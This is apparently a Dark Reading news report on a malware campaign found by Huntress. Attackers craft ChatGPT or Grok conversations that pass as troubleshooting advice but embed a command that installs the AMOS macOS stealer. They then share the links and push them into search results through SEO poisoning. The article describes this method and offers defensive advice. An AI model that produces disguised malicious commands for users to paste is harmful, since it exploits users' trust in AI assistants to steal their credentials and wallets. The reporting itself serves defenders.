4 Min Read

Source: Ascannio via Alamy Stock Photo
A new attack uses SEO poisoning and popular AI models to deliver infostealer malware, all while leveraging legitimate domains.
ClickFix attacks have gained significant popularity over the past year, using otherwise benign CAPTCHA-style prompts to lure users into a false sense of security and then tricking them into executing malicious prompts against themselves. These prompts are ofte…
4 Min Read

Source: Ascannio via Alamy Stock Photo
A new attack uses SEO poisoning and popular AI models to deliver infostealer malware, all while leveraging legitimate domains.
ClickFix attacks have gained significant popularity over the past year, using otherwise benign CAPTCHA-style prompts to lure users into a false sense of security and then tricking them into executing malicious prompts against themselves. These prompts are often delivered through SEO poisoning and phishing campaigns, representing one of the fancier applications of social engineering in cybercrime to date.
Huntress researchers Stuart Ashenbrenner and Jonathan Semon detailed a new take on this kind of attack, where the unknowing user Googles a problem they want to solve, such as cleaning their hard drive. Huntress found that for some searches, first page results would include legitimate ChatGPT and Grok links referencing the user’s request.
The user clicks on the result and is taken to a conversation with the large language models (LLMs) where the user is given instructions on how to, for example, clear disk space on MacOS. However, what looks like pretty straightforward advice actually asks the user to run a command prompt to communicate with an attacker server and install the infostealer malware — in this case MacOS stealer AMOS. This is exactly what happened to a Huntress customer on Dec. 5.
Related:Exploitation Activity Ramps Up Against React2Shell
This attack plays off the trust that users have (earned or unearned) in AI chatbots as well as whatever trust the attacker might be able to leverage out of a popular LLM brand.
Abusing Trust in AI for ClickFix-Style Attacks
According to Huntress’s blog post, the customer "believed they were following advice from a trusted AI assistant, delivered through a legitimate platform, surfaced by a search engine they use every day."
"Instead, they had just executed a command that downloaded an AMOS stealer variant that silently harvested their password, escalated to root, and deployed persistent malware," Ashenbrenner and Semon wrote. "No malicious download. No security warnings. No bypassing macOS’s built-in protections. Just a search, a click, and a copy-paste, into a full-blown persistent data leak."
While many social engineering campaigns leverage fake or copycat sites or a slightly misspelled email address to deliver malware, this campaign uses the actual AI and search platforms with a little bit of SEO poisoning to get victims to infect themselves.
Semon, who is principal SOC analyst at Huntress, tells Dark Reading that the attacker generates the link by engineering the LLM prompt to look like legitimate troubleshooting (while including the malicious command), and then creating a URL through share feature present in the AI platform. The malicious conversation is then shared across content farms, forums, Telegram channels, and low-quality indexed sites in order "to artificially inflate backlink relevance for troubleshooting keywords."
Related:React2Shell Vulnerability Under Attack From China-Nexus Groups
In this attack, the chat conversations deliver AMOS, a data stealing Mac malware that runs persistently and harvests targeted data such as cryptocurrency wallets, keychain access, browser credentials, and more.
Defending Against ClickFix-Style AI Attacks
Semon tells Dark Reading he believes "this tactic could become a dominant initial access method for stealers and other families of malware over the next six to 18 months, especially for credential theft, wallet hijacking, and Trojanized commands, across both Windows and macOS."
There are many different ways to approach this threat. Most directly, Huntress advises that because the infection vector looks like legitimate activity (a ChatGPT prompt), defenders should focus efforts on behavioral anomalies such as osascript, a command line utility in macOS, requesting user credentials and hidden executables in users’ home directories.
Related:Critical React Flaw Triggers Calls for Immediate Action
For end users, don’t execute terminal commands from unfamiliar sources and use strong password hygiene (such as long, random passwords and perhaps a manager to keep accounts secure). Also, although this attack is a bit of a unique case, it acts as a reminder to think critically before taking an AI output as actionable truth.
"Traditional malware delivery battles against instinct. Phishing emails feel suspicious. Cracked installers trigger warnings. But copying a Terminal command from our trusted AI friend ChatGPT? That feels productive. That feels safe. That feels like a simple solution to an annoying problem," the blog post read. "This strategy is a breakthrough, as attackers have discovered a delivery channel that not only bypasses security controls but also circumvents the human threat model entirely."
About the Author
Senior News Writer, Dark Reading
Alex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. In his spare time, Alex hosts the weekly Nintendo podcast Talk Nintendo Podcast and works on personal writing projects, including two previously self-published science fiction novels.